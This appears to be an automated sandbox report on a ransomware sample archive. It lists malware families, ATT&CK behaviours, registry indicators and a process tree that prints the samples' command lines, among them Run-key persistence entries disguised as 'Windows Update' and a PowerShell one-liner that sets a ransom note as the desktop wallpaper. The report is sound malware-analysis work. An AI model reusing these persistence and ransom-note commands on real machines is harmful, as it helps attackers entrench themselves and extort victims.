Analysis Overview
SHA256
4b4567580aa77913f8b2845b322a1fa43010c5210f791fbbe780ec75934a4f23
Threat Level: Known bad
The file RNSM00486.7z was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
Djvu Ransomware
Detected Djvu ransomware
Avoslocker Ransomware
Renames multiple (141) files with added filename extension
Modifies Windows Firewall
Checks computer location settings
UPX packed file
Modifies file permissions
Loads dropped DLL
Executes dropped EXE
Adds Run key to start application
Uses Tor communications
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Drops file in Program Files directory
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Program crash
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-10 18:04
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-10 18:03
Reported
2024-09-10 18:10
Platform
win10v2004-20240802-en
Max time kernel
75s
Max time network
363s
Command Line
Signatures
Avoslocker Ransomware
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
njRAT/Bladabindi
Renames multiple (141) files with added filename extension
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00486\smss.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\Desktop\\00486\\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe\"" | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hacker Man = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\svchost.exe" | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Google123.exe\"" | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sffnzaz6da = "C:\\Users\\Admin\\Desktop\\00486\\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-ff48c2bbe7041e51d80d645ab33f62be643c85500bba8705c23f19c36f6b09e1.exe" | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-ff48c2bbe7041e51d80d645ab33f62be643c85500bba8705c23f19c36f6b09e1.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Uses Tor communications
Drops file in Program Files directory
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\TASKKILL.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\TASKKILL.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\TASKKILL.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\TASKKILL.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\TASKKILL.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\TASKKILL.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00486.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00486.7z"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /1
C:\Users\Admin\Desktop\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1968 -ip 1968
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 272
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\00486\djfgkjdnbkjdfhooerkhjfjdlfkgdf.vbs"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1968 -ip 1968
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 296
C:\Users\Admin\Desktop\00486\Setup.exe
"C:\Users\Admin\Desktop\00486\Setup.exe"
C:\Users\Admin\Desktop\00486\smss.exe
"C:\Users\Admin\Desktop\00486\smss.exe"
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
C:\Users\Admin\AppData\Roaming\Google123.exe
"C:\Users\Admin\AppData\Roaming\Google123.exe"
C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp" /SL5="$4036E,3291817,140800,C:\Users\Admin\Desktop\00486\Setup.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f9db2f36f2f8ac450c76bf898abc67c84779cc7f186ba7c1e55893497c18f6e9.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f9db2f36f2f8ac450c76bf898abc67c84779cc7f186ba7c1e55893497c18f6e9.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-ff48c2bbe7041e51d80d645ab33f62be643c85500bba8705c23f19c36f6b09e1.exe
HEUR-Trojan-Ransom.Win32.Cryptoff.vho-ff48c2bbe7041e51d80d645ab33f62be643c85500bba8705c23f19c36f6b09e1.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Cryptor.gen-a1b504b8e34200d8029f6d75491d517e460162cb9df438257ee4ed85f61c18bc.exe
HEUR-Trojan-Ransom.Win32.Cryptor.gen-a1b504b8e34200d8029f6d75491d517e460162cb9df438257ee4ed85f61c18bc.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Foreign.gen-77525158fc61a08878ee96643ed0ec90b2802149074c62ebc71e32e916cd1990.exe
HEUR-Trojan-Ransom.Win32.Foreign.gen-77525158fc61a08878ee96643ed0ec90b2802149074c62ebc71e32e916cd1990.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-2c845b259264a23fa465cb59c422fd851c95dd92b5d26d2cec867085623e18df.exe
HEUR-Trojan-Ransom.Win32.Generic-2c845b259264a23fa465cb59c422fd851c95dd92b5d26d2cec867085623e18df.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-3044e01a1877af43c81c2585f2dc9842d9c9a562da13e215e5197a0142eb825f.exe
HEUR-Trojan-Ransom.Win32.Generic-3044e01a1877af43c81c2585f2dc9842d9c9a562da13e215e5197a0142eb825f.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-75f14fff0b30ca2658fa6824459ebc5d9ff31463bb44e33856d1e33d3db24c53.exe
HEUR-Trojan-Ransom.Win32.Generic-75f14fff0b30ca2658fa6824459ebc5d9ff31463bb44e33856d1e33d3db24c53.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-d2cec9aaa304bffab0fa9359abb6d4a64c62e2c3ebc78fbda5947b766040cc78.exe
HEUR-Trojan-Ransom.Win32.Generic-d2cec9aaa304bffab0fa9359abb6d4a64c62e2c3ebc78fbda5947b766040cc78.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-d74b85d646feda822c37e75a040d6f78c5bb77a2bff573cd1b979a6cee24e14a.exe
HEUR-Trojan-Ransom.Win32.Generic-d74b85d646feda822c37e75a040d6f78c5bb77a2bff573cd1b979a6cee24e14a.exe
C:\Users\Admin\AppData\Roaming\important files.exe
"C:\Users\Admin\AppData\Roaming\important files.exe" C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-2c845b259264a23fa465cb59c422fd851c95dd92b5d26d2cec867085623e18df.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-d8734950116b8058dc8c585234743b956b910cf9e9342cd18b9aaea60e863413.exe
HEUR-Trojan-Ransom.Win32.Generic-d8734950116b8058dc8c585234743b956b910cf9e9342cd18b9aaea60e863413.exe
C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe
"C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe" unk
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe
"C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe" unk2
C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe
"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe" unk3
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-eee2c2013ccae9a42d281f1fb2515b422da0b690f7b0c2a67753dde366754e35.exe
HEUR-Trojan-Ransom.Win32.Generic-eee2c2013ccae9a42d281f1fb2515b422da0b690f7b0c2a67753dde366754e35.exe
C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe
"C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe" execute
C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe
"C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe" autorun
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-083dbc12b101020fc3a3391de52133589d2d07eeb526e9d6fb7e8452b326119f.exe
HEUR-Trojan.MSIL.Crypt.gen-083dbc12b101020fc3a3391de52133589d2d07eeb526e9d6fb7e8452b326119f.exe
C:\Users\Admin\AppData\Local\Temp\Clickermann.exe
"C:\Users\Admin\AppData\Local\Temp\Clickermann.exe"
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-1dc1a41ffe0e5478df5e628ff818e5abb06fba2b879549ccdb7f810e84d65f18.exe
HEUR-Trojan.MSIL.Crypt.gen-1dc1a41ffe0e5478df5e628ff818e5abb06fba2b879549ccdb7f810e84d65f18.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-2243db692345300fa85044165d51f647130d7ad6073c1560b11788bc86cad760.exe
HEUR-Trojan.MSIL.Crypt.gen-2243db692345300fa85044165d51f647130d7ad6073c1560b11788bc86cad760.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f
C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
"C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
C:\Users\Admin\AppData\Local\Temp\чит.exe.exe
"C:\Users\Admin\AppData\Local\Temp\чит.exe.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f
C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
"C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
C:\Users\Admin\AppData\Local\Temp\4cf45a43-5c69-4117-9960-a5763c5fa241.exe
"C:\Users\Admin\AppData\Local\Temp\4cf45a43-5c69-4117-9960-a5763c5fa241.exe"
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-24d6bdcc1fd603ed16d96146e9dd9c3c876c19f70a0b262de431e5c333b43d49.exe
HEUR-Trojan.MSIL.Crypt.gen-24d6bdcc1fd603ed16d96146e9dd9c3c876c19f70a0b262de431e5c333b43d49.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\225480302.png /f
C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe
"C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe"
C:\Windows\94000696690303050\winsvcs.exe
C:\Windows\94000696690303050\winsvcs.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-26e821bcc82ab2a0ca1415d7b1b33d09dcf9ca7a5b8bb53376804493367257ff.exe
HEUR-Trojan.MSIL.Crypt.gen-26e821bcc82ab2a0ca1415d7b1b33d09dcf9ca7a5b8bb53376804493367257ff.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-466841e0cfbae323f68ec6283ba91acd56ffe861c77a3c5f7c618bd2f715fca6.exe
HEUR-Trojan.MSIL.Crypt.gen-466841e0cfbae323f68ec6283ba91acd56ffe861c77a3c5f7c618bd2f715fca6.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-521798e7fc5b493255379ac100b4a7cc094c46d0ab0e572097bd6f5045cff824.exe
HEUR-Trojan.MSIL.Crypt.gen-521798e7fc5b493255379ac100b4a7cc094c46d0ab0e572097bd6f5045cff824.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-5aab1a11e7a841129342bf643c7916f2b6eb1f5de85d7dfe0a434a414b932bb4.exe
HEUR-Trojan.MSIL.Crypt.gen-5aab1a11e7a841129342bf643c7916f2b6eb1f5de85d7dfe0a434a414b932bb4.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-5d6272028e58571ac67a39a449ccd6666dad00ecc4fd457db918e4448284f236.exe
HEUR-Trojan.MSIL.Crypt.gen-5d6272028e58571ac67a39a449ccd6666dad00ecc4fd457db918e4448284f236.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-615ae4e917dab894699846dc78a8c9daf07fcbe5f4ad06483b8a4a5bd17d9e4e.exe
